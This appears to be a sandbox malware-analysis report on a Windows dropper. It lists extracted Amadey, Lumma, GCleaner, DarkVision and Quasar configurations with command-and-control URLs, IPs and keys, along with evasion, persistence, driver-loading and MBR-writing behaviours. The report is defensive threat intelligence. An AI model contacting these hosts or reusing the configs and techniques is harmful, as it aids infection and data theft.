Analysis
-
max time kernel
132s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
06/04/2025, 13:37
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
157c7edc26fa7d289b3ce9ea7216b5c8
-
SHA1
683b9760a0200f2c14e627b41f3bc12942f28220
-
SHA256
eb38bc2ecfa1e5f1092f1f3053d15696e10cc2bc65294bfb20189a0e46c8868d
-
SHA512
3b65eac53c031982e292bbd80a9c2ecc536223ddd15bf5fc2c6583ddabd440507ff07547794973bb02de4d9e086f68691d04b8c0bdecf3f0c5bc84bbae5fdd39
-
SSDEEP
24576:pqDEvCTbMWu7rQYlBQcBiT6rprG8a03u:pTvC/MTQYxsWR7a03
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://plantainklj.run/opafg
https://jrxsafer.top/shpaoz
https://puerrogfh.live/iqwez
https://quavabvc.top/iuzhd
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://rambutanvcx.run/adioz
https://ywmedici.top/noagis
https://pepperiop.digital/oage
https://.ywmedici.top/noagis
https://navstarx.shop/FoaJSi
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://starcloc.bet/GOksAo
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
Extracted
gcleaner
185.156.73.98
45.91.200.135
Extracted
darkvision
82.29.67.160
-
url
http://107.174.192.179/data/003
https://grabify.link/ZATFQO
http://107.174.192.179/clean
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Extracted
quasar
1.5.0
Office04
goku92ad.zapto.org:5000
a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a
-
encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Modded Client Startup
-
subdirectory
SubDir
Signatures
-
Amadey family
-
DarkVision Rat
DarkVision Rat is a trojan written in C++.
-
Darkvision family
-
Gcleaner family
-
Lumma family
-
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral1/memory/12660-27692-0x000000000CCA0000-0x000000000CDF4000-memory.dmp family_quasar behavioral1/memory/12660-27693-0x00000000054A0000-0x00000000054BA000-memory.dmp family_quasar -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bd439de25d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempAM5ZOLB8J75FT2GTUI28ALCVQPUULULK.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2f77fa74e4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 39c94fe8c8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cae1c578a6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 651ebb55d7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 83a08d4257.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 13 5696 powershell.exe 227 12660 powershell.exe 231 12660 powershell.exe 242 12660 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 12660 powershell.exe 5796 powershell.exe 5696 powershell.exe 3260 powershell.exe 9304 powershell.exe -
Downloads MZ/PE file 17 IoCs
flow pid Process 72 6056 rapes.exe 72 6056 rapes.exe 80 5304 svchost.exe 147 3040 svchost015.exe 181 6056 rapes.exe 41 6056 rapes.exe 33 6056 rapes.exe 93 6056 rapes.exe 93 6056 rapes.exe 93 6056 rapes.exe 93 6056 rapes.exe 143 5248 svchost015.exe 209 6056 rapes.exe 209 6056 rapes.exe 209 6056 rapes.exe 13 5696 powershell.exe 154 6056 rapes.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\System32\Drivers\b296ad91.sys de52ffae.exe File created C:\Windows\System32\Drivers\klupd_b296ad91a_arkmon.sys de52ffae.exe File created C:\Windows\System32\Drivers\klupd_b296ad91a_klbg.sys de52ffae.exe -
Sets service image path in registry 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\b296ad91\ImagePath = "System32\\Drivers\\b296ad91.sys" de52ffae.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b296ad91a_arkmon\ImagePath = "System32\\Drivers\\klupd_b296ad91a_arkmon.sys" de52ffae.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b296ad91a_klbg\ImagePath = "System32\\Drivers\\klupd_b296ad91a_klbg.sys" de52ffae.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b296ad91a_klark\ImagePath = "System32\\Drivers\\klupd_b296ad91a_klark.sys" de52ffae.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b296ad91a_mark\ImagePath = "System32\\Drivers\\klupd_b296ad91a_mark.sys" de52ffae.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b296ad91a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_b296ad91a_arkmon.sys" de52ffae.exe -
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cae1c578a6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 651ebb55d7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 651ebb55d7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bd439de25d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2f77fa74e4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2f77fa74e4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 39c94fe8c8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 83a08d4257.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bd439de25d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempAM5ZOLB8J75FT2GTUI28ALCVQPUULULK.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempAM5ZOLB8J75FT2GTUI28ALCVQPUULULK.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 39c94fe8c8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 83a08d4257.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cae1c578a6.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation TempAM5ZOLB8J75FT2GTUI28ALCVQPUULULK.EXE Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation larBxd7.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation mshta.exe -
Deletes itself 1 IoCs
pid Process 5116 w32tm.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_bee518ed.cmd powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_bee518ed.cmd powershell.exe -
Executes dropped EXE 34 IoCs
pid Process 2396 TempAM5ZOLB8J75FT2GTUI28ALCVQPUULULK.EXE 6056 rapes.exe 3180 rapes.exe 5220 mtCxnCB.exe 3604 2f77fa74e4.exe 5248 svchost015.exe 1940 39c94fe8c8.exe 3040 svchost015.exe 2328 mtCxnCB.exe 2396 VrQSuEQ.exe 2640 UZPt0hR.exe 1196 RYZusWg.exe 5768 tzutil.exe 5116 w32tm.exe 10544 n0hEgR9.exe 10868 rapes.exe 11308 LJl8AAr.exe 11896 larBxd7.exe 4904 Jordan.com 6968 IsValueCreated.exe 10712 qhjMWht.exe 10940 49993f1a.exe 13216 amnew.exe 6632 de52ffae.exe 7080 futors.exe 5272 83a08d4257.exe 4444 cae1c578a6.exe 1584 bd439de25d.exe 12472 svchost015.exe 548 svchost015.exe 6844 Rm3cVPI.exe 4824 rapes.exe 8296 futors.exe 3916 651ebb55d7.exe -
Identifies Wine through registry keys 2 TTPs 11 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine 83a08d4257.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine cae1c578a6.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine bd439de25d.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine 651ebb55d7.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine TempAM5ZOLB8J75FT2GTUI28ALCVQPUULULK.EXE Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine 2f77fa74e4.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine 39c94fe8c8.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b296ad91.sys de52ffae.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b296ad91.sys\ = "Driver" de52ffae.exe -
Loads dropped DLL 25 IoCs
pid Process 6632 de52ffae.exe 6632 de52ffae.exe 6632 de52ffae.exe 6632 de52ffae.exe 6632 de52ffae.exe 6632 de52ffae.exe 6632 de52ffae.exe 6632 de52ffae.exe 6632 de52ffae.exe 6632 de52ffae.exe 6632 de52ffae.exe 6632 de52ffae.exe 6632 de52ffae.exe 6632 de52ffae.exe 6632 de52ffae.exe 6632 de52ffae.exe 6632 de52ffae.exe 6632 de52ffae.exe 6632 de52ffae.exe 6632 de52ffae.exe 6632 de52ffae.exe 6632 de52ffae.exe 6632 de52ffae.exe 6632 de52ffae.exe 6632 de52ffae.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\59e6e30f-6786-41ef-b642-aeed64c2a953 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{14c6602c-d780-4a64-964d-bfc5eba14541}\\59e6e30f-6786-41ef-b642-aeed64c2a953.cmd\"" de52ffae.exe Set value (str) \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cae1c578a6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10053300101\\cae1c578a6.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bd439de25d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10053310101\\bd439de25d.exe" futors.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: de52ffae.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 de52ffae.exe File opened for modification \??\PHYSICALDRIVE0 83a08d4257.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 7696 tasklist.exe 7160 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
pid Process 2396 TempAM5ZOLB8J75FT2GTUI28ALCVQPUULULK.EXE 6056 rapes.exe 3180 rapes.exe 3604 2f77fa74e4.exe 1940 39c94fe8c8.exe 10868 rapes.exe 5272 83a08d4257.exe 4444 cae1c578a6.exe 1584 bd439de25d.exe 4824 rapes.exe 3916 651ebb55d7.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 3604 set thread context of 5248 3604 2f77fa74e4.exe 106 PID 1940 set thread context of 3040 1940 39c94fe8c8.exe 110 PID 2396 set thread context of 6092 2396 VrQSuEQ.exe 121 PID 10544 set thread context of 10596 10544 n0hEgR9.exe 135 PID 11308 set thread context of 11376 11308 LJl8AAr.exe 138 PID 4444 set thread context of 12472 4444 cae1c578a6.exe 173 PID 1584 set thread context of 548 1584 bd439de25d.exe 174 PID 6968 set thread context of 9220 6968 IsValueCreated.exe 183 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 49993f1a.exe File opened (read-only) \??\VBoxMiniRdrDN de52ffae.exe -
Drops file in Windows directory 7 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempAM5ZOLB8J75FT2GTUI28ALCVQPUULULK.EXE File opened for modification C:\Windows\GovernmentalOttawa larBxd7.exe File opened for modification C:\Windows\AmongDouble larBxd7.exe File opened for modification C:\Windows\GentleOklahoma larBxd7.exe File opened for modification C:\Windows\ModularVol larBxd7.exe File opened for modification C:\Windows\LowerOrgasm larBxd7.exe File created C:\Windows\Tasks\futors.job amnew.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh de52ffae.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh de52ffae.exe -
System Location Discovery: System Language Discovery 1 TTPs 47 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 83a08d4257.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bd439de25d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cae1c578a6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 651ebb55d7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2f77fa74e4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Jordan.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempAM5ZOLB8J75FT2GTUI28ALCVQPUULULK.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UZPt0hR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qhjMWht.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language larBxd7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 49993f1a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language de52ffae.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mtCxnCB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 39c94fe8c8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mtCxnCB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings rapes.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 932 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 12660 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5696 powershell.exe 5696 powershell.exe 2396 TempAM5ZOLB8J75FT2GTUI28ALCVQPUULULK.EXE 2396 TempAM5ZOLB8J75FT2GTUI28ALCVQPUULULK.EXE 6056 rapes.exe 6056 rapes.exe 3180 rapes.exe 3180 rapes.exe 5220 mtCxnCB.exe 5220 mtCxnCB.exe 5220 mtCxnCB.exe 5220 mtCxnCB.exe 5220 mtCxnCB.exe 5220 mtCxnCB.exe 3604 2f77fa74e4.exe 3604 2f77fa74e4.exe 1940 39c94fe8c8.exe 1940 39c94fe8c8.exe 2328 mtCxnCB.exe 2328 mtCxnCB.exe 2328 mtCxnCB.exe 2328 mtCxnCB.exe 2328 mtCxnCB.exe 2328 mtCxnCB.exe 6092 MSBuild.exe 6092 MSBuild.exe 6092 MSBuild.exe 6092 MSBuild.exe 3260 powershell.exe 3260 powershell.exe 3260 powershell.exe 10596 MSBuild.exe 10596 MSBuild.exe 10596 MSBuild.exe 10596 MSBuild.exe 10868 rapes.exe 10868 rapes.exe 11376 MSBuild.exe 11376 MSBuild.exe 11376 MSBuild.exe 11376 MSBuild.exe 4904 Jordan.com 4904 Jordan.com 4904 Jordan.com 4904 Jordan.com 4904 Jordan.com 4904 Jordan.com 10712 qhjMWht.exe 10712 qhjMWht.exe 10712 qhjMWht.exe 10712 qhjMWht.exe 10712 qhjMWht.exe 10712 qhjMWht.exe 5272 83a08d4257.exe 5272 83a08d4257.exe 4444 cae1c578a6.exe 4444 cae1c578a6.exe 1584 bd439de25d.exe 1584 bd439de25d.exe 4904 Jordan.com 4904 Jordan.com 4904 Jordan.com 4904 Jordan.com 12660 powershell.exe -
Suspicious behavior: LoadsDriver 4 IoCs
pid Process 6632 de52ffae.exe 6632 de52ffae.exe 6632 de52ffae.exe 6632 de52ffae.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 2640 UZPt0hR.exe 2640 UZPt0hR.exe 2640 UZPt0hR.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 5696 powershell.exe Token: SeDebugPrivilege 3260 powershell.exe Token: SeDebugPrivilege 1196 RYZusWg.exe Token: SeDebugPrivilege 7160 tasklist.exe Token: SeDebugPrivilege 7696 tasklist.exe Token: SeDebugPrivilege 6632 de52ffae.exe Token: SeBackupPrivilege 6632 de52ffae.exe Token: SeRestorePrivilege 6632 de52ffae.exe Token: SeLoadDriverPrivilege 6632 de52ffae.exe Token: SeShutdownPrivilege 6632 de52ffae.exe Token: SeSystemEnvironmentPrivilege 6632 de52ffae.exe Token: SeSecurityPrivilege 6632 de52ffae.exe Token: SeBackupPrivilege 6632 de52ffae.exe Token: SeRestorePrivilege 6632 de52ffae.exe Token: SeDebugPrivilege 6632 de52ffae.exe Token: SeSystemEnvironmentPrivilege 6632 de52ffae.exe Token: SeSecurityPrivilege 6632 de52ffae.exe Token: SeCreatePermanentPrivilege 6632 de52ffae.exe Token: SeShutdownPrivilege 6632 de52ffae.exe Token: SeLoadDriverPrivilege 6632 de52ffae.exe Token: SeIncreaseQuotaPrivilege 6632 de52ffae.exe Token: SeSecurityPrivilege 6632 de52ffae.exe Token: SeSystemProfilePrivilege 6632 de52ffae.exe Token: SeDebugPrivilege 6632 de52ffae.exe Token: SeMachineAccountPrivilege 6632 de52ffae.exe Token: SeCreateTokenPrivilege 6632 de52ffae.exe Token: SeAssignPrimaryTokenPrivilege 6632 de52ffae.exe Token: SeTcbPrivilege 6632 de52ffae.exe Token: SeAuditPrivilege 6632 de52ffae.exe Token: SeSystemEnvironmentPrivilege 6632 de52ffae.exe Token: SeLoadDriverPrivilege 6632 de52ffae.exe Token: SeLoadDriverPrivilege 6632 de52ffae.exe Token: SeIncreaseQuotaPrivilege 6632 de52ffae.exe Token: SeSecurityPrivilege 6632 de52ffae.exe Token: SeSystemProfilePrivilege 6632 de52ffae.exe Token: SeDebugPrivilege 6632 de52ffae.exe Token: SeMachineAccountPrivilege 6632 de52ffae.exe Token: SeCreateTokenPrivilege 6632 de52ffae.exe Token: SeAssignPrimaryTokenPrivilege 6632 de52ffae.exe Token: SeTcbPrivilege 6632 de52ffae.exe Token: SeAuditPrivilege 6632 de52ffae.exe Token: SeSystemEnvironmentPrivilege 6632 de52ffae.exe Token: SeDebugPrivilege 12660 powershell.exe Token: SeDebugPrivilege 9304 powershell.exe Token: SeDebugPrivilege 6968 IsValueCreated.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 1968 2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1968 2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1968 2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 4904 Jordan.com 4904 Jordan.com 4904 Jordan.com 13216 amnew.exe -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 1968 2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1968 2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1968 2025-04-06_157c7edc26fa7d289b3ce9ea7216b5c8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 4904 Jordan.com 4904 Jordan.com 4904 Jordan.com -
Suspicious use of WriteProcessMemory 64 IoCs
